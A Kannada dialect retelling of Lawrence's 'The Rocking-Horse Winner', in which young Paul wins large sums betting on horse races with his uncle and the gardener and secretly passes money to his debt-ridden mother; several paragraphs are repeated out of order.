ಒಂದು ಸಲ ನೀನು ನನಗ ಹತ್ತು ಶೀಲಿಂಗ್‍ನ ನೋಟು ಕೊಟ್ಟಿದ್ದಿ, ನೆನಪೈತೇನು? ಆವಾಗಿಂದ ನಾ ಗೆಲ್ಲಕೋತ ಬಂದೆ. ನೀ ಕೊಟ್ಟ ರೊಕ್ಕದ ಅದೃಷ್ಟ ಚೊಲೋ ಐತೆಂತ ನಾ ಇದನ್ನೆಲ್ಲ ನಿನಗ ಹೇಳಲಿಕ್ಕೆ ಹತ್ತೇನಿ, ನೀ ಹಿಂದ ದುಡ್ಡು ಕೊಟ್ಟಿರಲಿಲ್ಲಂದ್ರ ನಾ ನಿನಗ ಈ ಗುಟ್ಟು ಹೇಳ್ತಿರಲಿಲ್ಲ. ನೆನಪಿರಲಿ ಮತ್ತ. ಯಾರಿಗೂ ಗೊತ್ತಾಗಬಾರದು..”

“ನಿನಗ ಅಷ್ಟು ವಿಶ್ವಾಸ ಇದ್ರ ಮಿರ್ಜಾ ಮ್ಯಾಲ ಹಣ ಹಾಕು.. ಆದರ ನನ್ನ ಪ್ರಕಾರ ಗೆಲ್ಲುವ ಕುದುರೆ ಅಂದ್ರ ಡೆಫೊಡಿಲ್..”

ಡೆಫೊಡಿಲ್ ಕುದುರೆಯ ಹೆಸರು ಯಾರ ಬಾಯಲ್ಲಿಯೂ ಪ್ರಸ್ತಾಪವಾಗಿರಲಿಲ್ಲ. ಬಹುಶ: ಅದು ಕೊನೆಯ ಸ್ಥಾನದಲ್ಲಿ ಇರುವಂತಹದು.

“ಮಾಂವಾ, ಇನ್ನೊಂದು ಮಾತು. ಮತ್ತ ಇದು ಯಾರಿಗೂ ಗೊತ್ತಾಗಬಾರದು. ಈ ರೇಸ್ ಬಗ್ಗೆ ನನಗ ಮತ್ತು ಬ್ಯಾಸೆಟ್‍ಗೆ ಮಾತ್ರ ಗೊತ್ತು. ನಾನು ಮತ್ತು ಆಂವ ಪಾರ್ಟನರ್‍ಶಿಪ್ ಮ್ಯಾಲ ರೊಕ್ಕ ಹಾಕತಿರತೇವಿ. ನನಗ ಮೊದಲ ರೊಕ್ಕ ಕೊಟ್ಟಿದ್ದು ಅಂವನೆ. ಐದು ಶೀಲಿಂಗ್ ಕೊಟ್ಟಿದ್ದ. ಆವಾಗ ನಾ ಸೋತೆ. ಒಂದು ಸಲ ನೀನು ನನಗ ಹತ್ತು ಶೀಲಿಂಗ್‍ನ ನೋಟು ಕೊಟ್ಟಿದ್ದಿ, ನೆನಪೈತೇನು? ಆವಾಗಿಂದ ನಾ ಗೆಲ್ಲಕೋತ ಬಂದೆ. ನೀ ಕೊಟ್ಟ ರೊಕ್ಕದ ಅದೃಷ್ಟ ಚೊಲೋ ಐತೆಂತ ನಾ ಇದನ್ನೆಲ್ಲ ನಿನಗ ಹೇಳಲಿಕ್ಕೆ ಹತ್ತೇನಿ, ನೀ ಹಿಂದ ದುಡ್ಡು ಕೊಟ್ಟಿರಲಿಲ್ಲಂದ್ರ ನಾ ನಿನಗ ಈ ಗುಟ್ಟು ಹೇಳ್ತಿರಲಿಲ್ಲ. ನೆನಪಿರಲಿ ಮತ್ತ. ಯಾರಿಗೂ ಗೊತ್ತಾಗಬಾರದು..”

‘ಆಯ್ತು ಬಿಡೋ ಪಾಲ್. ಯಾಕ ನನ್ನನ್ನ ನಂಬಂಗಿಲ್ಲೇನು? ಸಾಮಾನ್ಯವಾಗಿ ಎಷ್ಟು ದುಡ್ಡು ಹಾಕ್ತಿ?’

“ನನ್ನ ಕಡೆ ಇಪ್ಪತ್ತು ಪೌಂಡ್ ಇಟ್ಟುಕೊಂಡು ಉಳಿದಿದ್ದನ್ನೆಲ್ಲ ಜೂಜಿಗೆ ಹಾಕತೇನಿ.”

‘ಅಂದರ ನಿನ್ನ ಕಡೆ ಬಾಳ ದುಡ್ಡು ಐತಿ? ಅಷ್ಟೆಲ್ಲ ದುಡ್ಡು ಎಲ್ಲಿ ಇಟ್ಟಿರಿತೀಯ?’

“ನಾ ಗೆದ್ದಂತಹ ದುಡ್ಡನ್ನು ಬ್ಯಾಸೆಟ್‍ನ ಕಡೆ ಇಟ್ಟಕೊಳ್ಳಾಕ ಕೊಟ್ಟೇನಿ. ಯಾರ ಮುಂದೂ ಹೇಳಬ್ಯಾಡ ಅಂತ ಅಂವಗ ಹೇಳೇನಿ. ಆದರ ಆಂವ ರೇಸಿಗೆ ನನ್ನಷ್ಟು ದುಡ್ಡು ಹಾಕೋದಿಲ್ಲ. ಹೆದರತಾನು. ಒತ್ತಾಯ ಮಾಡಿದ ಮ್ಯಾಲ ಬಾಳಂದ್ರ ನಾ ಹಾಕಿದ ಅರ್ಧ ಹಾಕತಾನು..”

ಹುಡುಗ ಮೊದಲ ಬಾರಿಗೆ ರೇಸ್ ನೋಡಲು ಬಂದಿದ್ದ. ಇಷ್ಟು ಸಣ್ಣ ಹುಡುಗ ಆಡಲು ಬಂದರೆ ಜನ ಏನೆಂದಾರು? ಅದಕ್ಕಾಗಿ ಪಾಲ್‍ನ ಪರವಾಗಿ ಬ್ಯಾಸೆಟ್‍ನೆ ಆಡುತ್ತಿದ್ದ.

ಮಾವ ವಿಷಯ ಬೆಳೆಸದೆ ಸುಮ್ಮನಾದ. ಲಿಂಕನ್ ಹೆಸರಿನ ರೇಸಿಗೆ ಹುಡುಗನನ್ನು ಕರೆದುಕೊಂಡು ಹೋಗಬೇಕೆಂದು ಅವನು ತೀರ್ಮಾನಿಸಿದ್ದ. ಅದರಂತೆ ಅವರು ಬಂದು ಕುಳಿತಿದ್ದರು. ಹುಡುಗನ ಮಾತಿಗೆ ಯಾಕೆ ಅಷ್ಟು ಕಿಮ್ಮತ್ತು ಕೊಡುವುದೆಂದು ಆತ ಡೆಫೊಡಿಲ್ ಕುದುರೆಯ ಮೇಲೆ ಕೇವಲ ಐದು ಪೌಂಡ್, ಮಿರ್ಜಾ ಮೇಲೆ ಇಪ್ಪತು ಹಾಕಿದ್ದ. ಹುಡುಗ ಬರೀ ಡೆಫೊಡಿಲ್ ಮೇಲೆ ಮಾತ್ರ ಬಾಜಿ ಕಟ್ಟಿದ್ದ. ಹುಡುಗ ಮೊದಲ ಬಾರಿಗೆ ರೇಸ್ ನೋಡಲು ಬಂದಿದ್ದ. ಇಷ್ಟು ಸಣ್ಣ ಹುಡುಗ ಆಡಲು ಬಂದರೆ ಜನ ಏನೆಂದಾರು? ಅದಕ್ಕಾಗಿ ಪಾಲ್‍ನ ಪರವಾಗಿ ಬ್ಯಾಸೆಟ್‍ನೆ ಆಡುತ್ತಿದ್ದ.

ಪಾಲ್‍ನಿಗೆ ರೇಸ್ ನೋಡುತ್ತಿರುವಂತೆ ತುಂಬ ರೋಮಾಂಚನವಾಗುತ್ತಿತ್ತು. ಮಾವ ಮತ್ತು ಆತ ಬಿಟ್ಟುಗಣ್ಣಿಂದ ನೋಡುತ್ತಿದ್ದಾರೆ. ಅವರ ಪಕ್ಕದವನೊಬ್ಬ ಲ್ಯಾನ್ಸ್‍ಲಾಟ್ ಕುದುರೆಯ ಮೇಲೆ ತುಂಬ ದುಡ್ಡು ಹಾಕಿದ್ದನೆಂದು ಕಾಣುತ್ತದೆ. ಆತ ಒಂದೆ ಸಮನೆ ಎದ್ದು ನಿಂತು ಆ ಕುದುರೆಯ ಹೆಸರನ್ನು ಕೂಗುತ್ತಿದ್ದ. ಮಿರ್ಜಾ ಗೆಲ್ಲಬಹುದೆಂದು ಮಾವ ಭಾವಿಸಿದ್ದ. ಆದರೆ ಡೆಫೊಡಿಲ್ ಪ್ರಥಮ, ಲ್ಯಾನ್ಸ್‍ಲಾಟ್ ದ್ವಿತೀಯ, ಮಿರ್ಜಾ ತೃತೀಯ ಸ್ಥಾನ ಗಳಿಸಿದವು. ಹುಡುಗನ ಕಡೆಯ ದುಡ್ಡು ಈಗ ಸಾವಿರದ ಐನೂರು ಪೌಂಡ್‍ಗಳನ್ನು ದಾಟಿತ್ತು. ಆಸ್ಕರ್, ಬ್ಯಾಸೆಟ್ ಮತ್ತು ಪಾಲ್ ಮೂವರು ಸೇರಿ ಚರ್ಚಿಸಿದರು. ಸುಮಾರು ಒಂದು ವರ್ಷದಿಂದ ಪಾಲ್ ಇದರ ಹಿಂದೆ ಬಿದ್ದಿದ್ದಾನೆಂದು ತಿಳಿಯಿತು. ಹುಡುಗ ಮತ್ತು ಬ್ಯಾಸೆಟ್ ಕೂಡ ಕೆಲವು ಸಲ ಸೋತಿದ್ದರು. ಆದರೆ ಗೆದ್ದದ್ದು ಬಹಳ ಸಲವಾಗಿತ್ತು. ಪಾಲ್‍ನಿಗೆ ಒಂದೊಂದು ಸಲ ಇಂತಹುದೇ ಕುದುರೆ ಗೆಲ್ಲುತ್ತದೆಯೆಂದು ನಿಕ್ಕಿ ತಿಳಿದಿರುತ್ತಿತ್ತು. ಇದೆಲ್ಲ ಹೇಗೆ ಸಾಧ್ಯವೆಂದು ಆಸ್ಕರ್ ವಿಸ್ಮಯ ವ್ಯಕ್ತಪಡಿಸಿದಾಗ ಬ್ಯಾಸೆಟ್ ಹೇಳಿದ: “ಪಾಲ್‍ನಿಗೆ ಮೇಲಿನಿಂದ ದೇವರೆ ಹೇಳುತ್ತಾನೆಂದು ಕಾಣುತ್ತದೆ.” ಈಗ ಆಸ್ಕರ್ ಮಾವನೂ ಅವರ ಪಾರ್ಟನರ್ ಆದ.

ಇಷ್ಟೆಲ್ಲ ಖಾತ್ರಿ ಇರಲಿಕ್ಕೆ ಹೆಂಗ ಸಾಧ್ಯ ಐತೆಂತ? ಸುಮ್ಮನ ಬಿಟ್ಟು ಬಿಡೋದು ಚೊಲೋ..” ಈ ಹುಡುಗನಲ್ಲಿರುವ ಅದಮ್ಯ ಆತ್ಮವಿಶ್ವಾಸವನ್ನು ಕಂಡು ಮಾವನಿಗೆ ಅಚ್ಚರಿಯಾಗುತ್ತಿತ್ತು. ಹೆದರಿಕೆಯೂ ಆಗುತ್ತಿತ್ತು.

ಇನ್ನೇನು ಲೇಗರ್ ಹೆಸರಿನ ರೇಸ್ ಹತ್ತಿರಕ್ಕೆ ಬಂದಾಗ ಪಾಲ್ ಹೇಳಿದ: “ನನಗನಿಸೋ ಮಟ್ಟಿಗೆ ಈ ಸಲ ಗೆಲ್ಲೋದು ‘ಲೈವಲಿ ಸ್ಪಾರ್ಕ್’ ಅನ್ನೋ ಕುದುರೆ.” ಹುಡುಗ ಈ ಸಲ ಒಂದು ಸಾವಿರ ಪೌಂಡ್ ಹಾಕಿದ. ಬ್ಯಾಸೆಟ್ ಐನೂರು ಕಟ್ಟಿದ. ಮಾವನಿಗೆ ಇನ್ನೂ ಹುಡುಗನ ಮೇಲೆ ಅರೆಮನಸ್ಸು. ಅದಕ್ಕೆ ಆತ ಹೆದರಿ ನೂರು ಆಡಿದ. ಕೊನೆಗೆ ಗೆದ್ದಿದ್ದು ಪಾಲ್ ಹೇಳಿದ ಕುದುರೆಯೇ. ಈ ಸಲ ಜೂಜು ಒಂದಕ್ಕೆ ಹತ್ತು ಪಟ್ಟು ಇತ್ತು. ಹೀಗಾಗಿ ಅವನಿಗೆ ಹತ್ತು ಸಾವಿರ ಪೌಂಡ್ ಬಂದವು. ಮಾವನೂ ಅನಾಯಾಸ ಒಂದು ಸಾವಿರ ಗೆದ್ದಿದ್ದ.

“ಏಯ್ ಪಾಲ್, ಇದನ್ನೆಲ್ಲ ನೋಡಿದರ ನನಗ ಯಾಕೋ ಹೆದರಿಕೆ ಆಗ್ತದ.. ಇಷ್ಟೆಲ್ಲ ಖಾತ್ರಿ ಇರಲಿಕ್ಕೆ ಹೆಂಗ ಸಾಧ್ಯ ಐತೆಂತ? ಸುಮ್ಮನ ಬಿಟ್ಟು ಬಿಡೋದು ಚೊಲೋ..” ಈ ಹುಡುಗನಲ್ಲಿರುವ ಅದಮ್ಯ ಆತ್ಮವಿಶ್ವಾಸವನ್ನು ಕಂಡು ಮಾವನಿಗೆ ಅಚ್ಚರಿಯಾಗುತ್ತಿತ್ತು. ಹೆದರಿಕೆಯೂ ಆಗುತ್ತಿತ್ತು.

ಈಗ ಮಾವನನ್ನು ಹುಡುಗನೇ ಸಮಾಧಾನಪಡಿಸಿದ: ‘ಏಯ್ ಮಾಂವ, ನೂರಕ್ಕ ನೂರು ಖಾತ್ರಿ ಅಂತ ನಾ ಹೇಳಂಗಿಲ್ಲ. ಒಮ್ಮೊಮ್ಮೆ ದೊಡ್ಡ ಪ್ರಮಾಣದಾಗ ಗೆಲ್ಲತೀವಿ. ಒಮ್ಮೊಮ್ಮೆ ಸೋಲತೇವಿ. ನಸೀಬ್ ಅನ್ನೋದು ಪ್ರತಿಸಲ ಒಂದ ರೀತಿ ಹೆಂಗ ಇರತೈತಿ ಹೇಳು?’

“ಆಯ್ತು, ಈ ದುಡ್ಡನ್ನೆಲ್ಲ ಏನು ಮಾಡ್ತಿ?”

‘ಮಾಂವ, ನಾನು ಜೂಜು ಆಡಲಿಕ್ಕೆ ಸುರು ಮಾಡಿದ್ದೇ ಅವ್ವನ ಸಲುವಾಗಿ. ಆಕೆ ಏನು ಹೇಳಿದಳು ಗೊತ್ತೇನು- ತನಗ ಅದೃಷ್ಟ ಇಲ್ಲ. ಅಪ್ಪಗೂ ಅದೃಷ್ಟ ಇಲ್ಲ ಅಂತ. ಅದಕ್ಕ ನಾ ಅನ್ನಕೊಂಡೆ- ಬಹುಶ: ನನಗ ಅದೃಷ್ಟ ಐತಿ ಅಂತ. ನಾ ಗೆದ್ದು ಅವ್ವನಿಗೆ ದುಡ್ಡು ಕೊಟ್ರ ಬಹುಶ: ನಮ್ಮ ಮನಿಯೊಳಗ ಕೇಳಿಬರುತ್ತಿರುವಂಥ ದುಡ್ಡು ದುಡ್ಡು ಎನ್ನುವ ಗುಸುಗುಸು ಶಬ್ದ ನಿಲ್ಲಬಹುದು ಅಂತ..’

ನಮ್ಮ ಹಿಂದಿನಿಂದ ಯಾರೋ ಒಂದೇ ಸಂವನ ಮಾತಾಡ್ತಿದಾರೋ ಏನೋ ಅನ್ನೋವಂಗ ಗುಸುಗುಸು ಶಬ್ದ ಕೇಳಿ ಕೇಳಿ ನನಗೂ ಸಾಕಾಗಿ ಹೋಗೇತಿ.. ಅದಕ್ಕ ನನ್ನಿಂದಲಾದರೂ ಅವ್ವನಿಗೆ ಸಹಾಯ ಮಾಡೋಣು ಅಂತ.

“ಏನದು ಗುಸುಗುಸು..”

ಹುಡುಗ ಹೇಳಲೋ ಬೇಡವೋ ಎಂದು ಒಂದು ಕ್ಷಣ ತಡವರಿಸಿದ: ‘ಅದೇ ಮಾಂವ, ನಮ್ಮ ಮನಿಯೊಳಗ ದುಡ್ಡಿನ ಕೊರತೆ ಐತಿ ಅನ್ನೋ ಮಾತು.. ಮತ್ತ ಮನಿಗೆ ಆಗಾಗ ಅಮ್ಮನ ಹೆಸರಲೇ ಬ್ಯಾಂಕಿನಿಂದ ಸಾಲ ವಸೂಲಿ ನೋಟೀಸ್ ಕೂಡ ಬರ್ತಿರತಾವು..’

“ಅದು ನನಗೂ ಗೊತ್ತು.. ಅಕ್ಕ ಸಾಲ ಹೆಂಗ ತೀರಿಸ್ತಾಳು ಅಂತ ನನಗ ಚಿಂತೆ ಆಗೇತಿ….”

‘ಮಾಂವ, ಮನಿಯೊಳಗ ಒಂದೊಂದು ಸಲ ಹೀಂಗ ಸೌಂಡ್ ಬರ್ತದಲ್ಲ, ದುಡ್ಡು ಇಲ್ಲದ್ದಕ್ಕ ನಮ್ಮನ್ನ ಯಾರೋ ಅವಮಾನ ಮಾಡ್ತಿದ್ದಾರೇನೋ ಅನಿಸ್ತದ..ನಮ್ಮ ಹಿಂದಿನಿಂದ ಯಾರೋ ಒಂದೇ ಸಂವನ ಮಾತಾಡ್ತಿದಾರೋ ಏನೋ ಅನ್ನೋವಂಗ ಗುಸುಗುಸು ಶಬ್ದ ಕೇಳಿ ಕೇಳಿ ನನಗೂ ಸಾಕಾಗಿ ಹೋಗೇತಿ.. ಅದಕ್ಕ ನನ್ನಿಂದಲಾದರೂ ಅವ್ವನಿಗೆ ಸಹಾಯ ಮಾಡೋಣು ಅಂತ. ನಮ್ಮನಿಯೊಳಗ ಕಟ್ಟಕಡೆಗೆ ನಾನು ಒಬ್ಬನಾದರೂ ಅದೃಷ್ಟವಂತ ಅದೇನಿ ಅಂತ ಸಾಬೀತು ಮಾಡಬೇಕಾಗೇದ…ಅದಕ್ಕ ಈ ಕುದುರಿ ಜೂಜಿನೊಳಗ ಕೈ ಹಾಕೇನಿ..’

“ನಿನ್ನಿಂದಾದರೂ ಮನಿಯೊಳಗಿನ ದುಷ್ಟ ಶಕ್ತಿಗಳು ದೂರ ಹೋಗಲಿ.. ಅಲ್ಲ?” ಮಾಂವ ಹೇಳಿದ ಮಾತಿಗೆ ಪಾಲ್ ಸುಮ್ಮನೆ ಅವನನ್ನು ಕಣ್ಣಲ್ಲಿ ಕಣ್ಣಿಟ್ಟು ನೋಡಿದ. ಬೆಂಕಿ ಉಗುಳುತ್ತಿರುವಂತೆ ಕಾಣುವ ಹುಡುಗನ ನೀಲಿ ಕಣ್ಣುಗಳನ್ನು ಕಂಡು ಮಾವನಿಗೆ ಅಚ್ಚರಿಯಾಯಿತು. “ಹಂಗಾರ ನೀ ಗೆದ್ದ ದುಡ್ಡು ಅಮ್ಮಗ ಕೊಡಾಕ ಹತ್ತೀ?”

ಅವನ ಅದೃಷ್ಟದ ಹೊರತಾಗಿಯೂ ಮನೆಯಲ್ಲಿ ಕೇಳಿಬರುತ್ತಿದ್ದ ಆ ಗುಸುಗುಸು ತೀರ ಹೆಚ್ಚಾಗಿತ್ತು. ಮನೆಯಲ್ಲಿ ಕಾಲಿಟ್ಟರೆ ಸಾಕು, ದುಡ್ಡು-ದುಡ್ಡು ಎನ್ನುವ ಶಬ್ದ ಹುಚ್ಚರಂತೆ ಪ್ರತಿಧ್ವನಿಸುತ್ತಿತ್ತು. ಆವತ್ತು ಅವ್ವನ ಹುಟ್ಟುಹಬ್ಬದ ದಿನ ಮನೆಗೆ ಬಂದ ಸಾವಿರ ಪೌಂಡ್‍ದೊಂದಿಗಿನ ಶುಭಾಶಯಗಳ ಪತ್ರ ನೋಡಿ ಬಹುಶ:

‘ಇನ್ನೂವರೆಗೂ ಕೊಟ್ಟಿಲ್ಲ. ಹೆಂಗ ಕೊಡಬೇಕು, ನನ್ನ ಕಡೆ ದುಡ್ಡು ಎಲ್ಲಿಂದ ಬಂತಂತ ಕೇಳಿದರ? ಅದೇ ನನಗ ತಿಳಿವಲ್ದ ಆಗೇತಿ ಮಾಮಾ. ಆ ದುಡ್ಡು ನಾ ಸಂಪಾದಿಸಿದ್ದು ಅಂತ ಆಕೀಗೆ ಗೊತ್ತಾಗಬಾರದು. ಗೊತ್ತಾದ್ರ ನನ್ನ ಆಕಿ ಆಡಲಿಕ್ಕೆ ಬಿಡೋದಿಲ್ಲ.’

“ಸರಿ, ಹೀಂಗ ಮಾಡೋಣು.” ಮಾವನಿಗೆ ಪರಿಚಿತ ವಕೀಲರೊಬ್ಬರ ಹತ್ತಿರ ಐದು ಸಾವಿರ ಪೌಂಡ್‍ಗಳನ್ನು ಕೊಡುವುದು. ಅವರು ಪ್ರತಿ ವರ್ಷ ಅಮ್ಮನ ಹುಟ್ಟುಹಬ್ಬದ ದಿನ ಒಂದು ಸಾವಿರ ಪೌಂಡ್‍ಗಳನ್ನು ಯಾರೋ ಒಬ್ಬರು ಹಿತೈಷಿಗಳು ಕೊಡುಗೆಯಾಗಿ ಕೊಟ್ಟಿದ್ದಾರೆಂದು ಹೇಳುವುದು. ಅಮ್ಮನಿಗೆ ಈ ರೀತಿಯ ಸರಪ್ರೈಜ್ ಕೊಡುವ ಯೋಜನೆ ಮಗನಿಗೆ ಇಷ್ಟವಾಯಿತು. ನವಂಬರ್‍ನಲ್ಲಿ ಅಮ್ಮನ ಹುಟ್ಟುಹಬ್ಬ ಬರುವ ಹೊತ್ತಿಗೆ, ಅವನ ಅದೃಷ್ಟದ ಹೊರತಾಗಿಯೂ ಮನೆಯಲ್ಲಿ ಕೇಳಿಬರುತ್ತಿದ್ದ ಆ ಗುಸುಗುಸು ತೀರ ಹೆಚ್ಚಾಗಿತ್ತು. ಮನೆಯಲ್ಲಿ ಕಾಲಿಟ್ಟರೆ ಸಾಕು, ದುಡ್ಡು-ದುಡ್ಡು ಎನ್ನುವ ಶಬ್ದ ಹುಚ್ಚರಂತೆ ಪ್ರತಿಧ್ವನಿಸುತ್ತಿತ್ತು. ಆವತ್ತು ಅವ್ವನ ಹುಟ್ಟುಹಬ್ಬದ ದಿನ ಮನೆಗೆ ಬಂದ ಸಾವಿರ ಪೌಂಡ್‍ದೊಂದಿಗಿನ ಶುಭಾಶಯಗಳ ಪತ್ರ ನೋಡಿ ಬಹುಶ: ಅವ್ವನಿಗೆ ಬಹಳಷ್ಟು ಖುಶಿಯಾಗಿರಬೇಕೆಂದು ಪಾಲ್ ಯೋಚಿಸಿದ. ಮನೆಯ ತೊಂದರೆಗಳು ಕಡಿಮೆಯಾಗಬಹುದು. ಅವ್ವನ ಚಿಂತೆ ದೂರಾಗಬಹುದು. ಅವ್ವ ತನ್ನನ್ನು ಇನ್ನು ಮೇಲೆ ಜಾಸ್ತಿ ಪ್ರೀತಿಸಬಹುದು. ತನ್ನನ್ನು ಬರಸೆಳೆದು ಮುದ್ದಿಸಬಹುದು. ಆದರೆ ಆತ ಎಣಿಸಿದಂತೆ ಏನೂ ನಡೆಯಲಿಲ್ಲ.

ತಾನು ಕಳಿಸಿದ ಸಾವಿರ ಪೌಂಡ್ ಇದ್ದರೂ ಅವ್ವ ಇತ್ತೀಚೆಗೆ ಹೊರಗೆ ಎಲ್ಲೋ ಕೆಲಸಕ್ಕೆಂದು ಹೋಗುತ್ತಿದ್ದಾಳೆ. ಇವಳ ಗೆಳತಿಯೊಬ್ಬಳು ಡ್ರೆಸ್‍ಗಳಿಗೆ ಹಾಗೂ ಕಿಟಕಿ-ಬಾಗಿಲಿನ ಪರದೆಗಳಿಗೆ ವಿಧವಿಧ ವಿನ್ಯಾಸ ಹಾಕಿಕೊಡುವ ಕಲಾವಿದೆಯಾಗಿ ಕೆಲಸ ಮಾಡುತ್ತಿದ್ದಳು. ಅಂತಹ ಡಿಸೈನ್ ತಯಾರಿಸುವುದರಲ್ಲಿ ಅವ್ವನದೂ ಕೂಡ ಎತ್ತಿದ ಕೈ. ಯಾವ ಗೆಳತಿಯ ಹತ್ತಿರ ಇವಳು ಕೆಲಸಕ್ಕೆಂದು ಹೋಗುತ್ತಿದ್ದಳೋ ಅವಳು ಸಾವಿರಾರು ಪೌಂಡ್‍ಗಳನ್ನು ಗಳಿಸಿದರೆ ಅವ್ವನಿಗೆ ಬರುತ್ತಿದ್ದುದು ನೂರಿನ್ನೂರು ಮಾತ್ರ. ಹಾಗಾಗಿ ಮತ್ತೆ ಅವ್ವ ಈ ಕೆಲಸದ ಬಗ್ಗೆಯೂ ತುಂಬ ನೊಂದುಕೊಳ್ಳುತ್ತಿದ್ದಳು. ಬಟ್ಟೆಗಳ ಡಿಸೈನ್ ಮಾಡುವುದರಲ್ಲಿ ತಾನು ಫಸ್ಟ್ ಬರಬೇಕು ಎಂಬ ಮಹತ್ವಾಕಾಂಕ್ಷೆ ಅವ್ವನಿಗಿತ್ತು. ಆದರೆ ಅವಳು ಅಲ್ಲಿಯೂ ಸೋತಳು. ಅವಳ ಹುಟ್ಟುಹಬ್ಬದ ದಿನ ಅವ್ವ ತನಗೆ ಏನಾದರೂ ವಿಶೇಷ ಹೇಳುತ್ತಾಳೆಂದುಕೊಂಡಿದ್ದ ಪಾಲ್‍ನಿಗೆ ನಿರಾಶೆಯಾಯಿತು. ಯಾರೋ ಅಪರಿಚಿತರು ಹುಟ್ಟುಹಬ್ಬದ ಶುಭಾಶಯಗಳೊಡನೆ ಸಾವಿರ ಪೌಂಡ್ ದುಡ್ಡು ಕಳಿಸಿದ್ದು ತಾಯಿ ಹಿರಿಹಿರಿ ಹಿಗ್ಗುತ್ತಾಳೆ ಎಂದು ಪಾಲ್ ಅಂದುಕೊಂಡಿದ್ದ. ಆದರೆ ಆ ಪತ್ರ ನೋಡಿದ ಅವ್ವ ಅದನ್ನು ಸಾಮಾನ್ಯ ಪತ್ರವೆಂಬಂತೆ ಒಳಗಿಟ್ಟುಕೊಂಡಳು. ಅವಳ ಮುಖದಲ್ಲಿ ಯಾವ ಗೆಲುವೂ ಕಾಣಲಿಲ್ಲ. ಈಗ ಹುಡುಗನೇ ಬಾಯಿಬಿಟ್ಟು ಕೇಳಬೇಕಾಯಿತು.

ಮತ್ತೇನು ಪ್ಲ್ಯಾನ್ ಮಾಡ್ಯಾಳಂದ್ರ ತಾನು ಸಾಲದ ಬಲಿಯೊಳಗ ಬಿದ್ದಿರೋದರಿಂದ್ರ ಅಷ್ಟೂ ದುಡ್ಡು ಒಮ್ಮೆಲೆ ಕೊಟ್ರ ಚೊಲೊ ಆಗ್ತದ ಅಂತ ವಿನಂತಿ ಮಾಡಿಕೊಂಡಾಳ. ತನ್ನ ಕಷ್ಟಕ್ಕ ನೆರವಾಗಬೇಕು ಅಂತ ಗೋಗರಿದ್ಲಂತ. ಆ ವಕೀಲ ನನ್ನನ್ನ ಕೇಳಲಿಕ್ಕೆ ಹತ್ತ್ಯಾನ.

‘ಅಮ್ಮ, ಅಮ್ಮ, ನಿನ್ನ ಹುಟ್ಟುಹಬ್ಬಕ್ಕೆ ಏನೋ ಪತ್ರ ಬಂದಂಗ ಇತ್ತು. ಯಾವುದೋ ಸಂತೋಷದ ಸುದ್ದಿ ಇರಬೇಕು..ಅಲ್ಲ?’

“ಅಂತಹ ದೊಡ್ಡ ಸಂತೋಷ ಏನಿಲ್ಲ, ಬಿಡು..” ಅವಳು ಅವನ ಉತ್ಸಾಹಕ್ಕೆ ಕೊಡ ತಣ್ಣೀರು ಸುರುವಿ ಹೊರಗೆ ಹೋದಳು. ಪುಟ್ಟ ಬಾಲಕನೊಬ್ಬ ತನ್ನ ನಿರಂತರ ದುಡಿಮೆಯಿಂದ ಸಾವಿರ ಪೌಂಡ್‍ಗಳನ್ನು ಬೇರೊಬ್ಬರ ಹೆಸರಿನಿಂದ ಕಳಿಸಿದ್ದರೂ ಆಕೆಗೆ ಕಿಂಚಿತ್ತೂ ಆಶ್ಚರ್ಯವಾಗಿಲ್ಲ. ಅದನ್ನು ತಿಳಿದು ಹುಡುಗನಿಗೆ ಅವಳ ನಡವಳಿಕೆಯ ಬಗ್ಗೆ ವಿಸ್ಮಯ ಪಟ್ಟ. ಜೊತೆಗೆ ನಿರಾಶೆಯೂ ಉಂಟಾಯಿತು.

ಮಧ್ಯಾಹ್ನ ಮಾವ ಭೆಟ್ಟಿಯಾದ: ‘ಏಯ್ ಪಾಲ್, ಕೇಳಿಲ್ಲಿ. ನಮ್ಮ ಪ್ಲ್ಯಾನ್ ಎಲ್ಲಾ ಉಲ್ಟಾ ಆಗೇದ. ನಿನ್ನ ಅಮ್ಮ ಇವತ್ತು ಆ ವಕೀಲನ್ನ ಭೆಟ್ಟಿಯಾಗಿ, ಅಂವನ ಕಡೆ ಐದು ಸಾವಿರ ಪೌಂಡ್ ಇದ್ದದ್ದನ್ನ ತಿಳಕೊಂಡಾಳ. ಮತ್ತೇನು ಪ್ಲ್ಯಾನ್ ಮಾಡ್ಯಾಳಂದ್ರ ತಾನು ಸಾಲದ ಬಲಿಯೊಳಗ ಬಿದ್ದಿರೋದರಿಂದ್ರ ಅಷ್ಟೂ ದುಡ್ಡು ಒಮ್ಮೆಲೆ ಕೊಟ್ರ ಚೊಲೊ ಆಗ್ತದ ಅಂತ ವಿನಂತಿ ಮಾಡಿಕೊಂಡಾಳ. ತನ್ನ ಕಷ್ಟಕ್ಕ ನೆರವಾಗಬೇಕು ಅಂತ ಗೋಗರಿದ್ಲಂತ. ಆ ವಕೀಲ ನನ್ನನ್ನ ಕೇಳಲಿಕ್ಕೆ ಹತ್ತ್ಯಾನ. ಈಗ ಏನು ಮಾಡೋದು ಹೇಳು? ನೀ ಕೊಡೋಣು ಅಂದ್ರ ಕೊಡೋದು. ಇಲ್ಲಾಂದ್ರ ಇಲ್ಲ. ನಾ ಹೇಳೋತನಕ ಕೊಡಬ್ಯಾಡ ಅಂತ ನಾ ವಕೀಲಗ ಹೇಳೇನಿ.’

“ಹೋಗ್ಲಿಬಿಡು ಮಾವ… ಪಾಪ, ಅವ್ವನ್ನ ಪರಿಸ್ಥಿತಿ ನೋಡಿದರ ಒಂಥರಾ ಕೆಟ್ಟ ಅನಸ್ತೇತಿ. ಆಕಿಗಿ ಬಾಳ ತ್ರಾಸ ಇರಬೇಕು.. ಬಹುಶ: ಅದಕ್ಕ ಕೇಳಲಿಕ್ಕೆ ಹತ್ತ್ಯಾಳ. ಕೊಟ್ಟಬಿಡೋಣು. ನಾವು ಮತ್ತ ಗಳಿಸೋಣಂತ..”

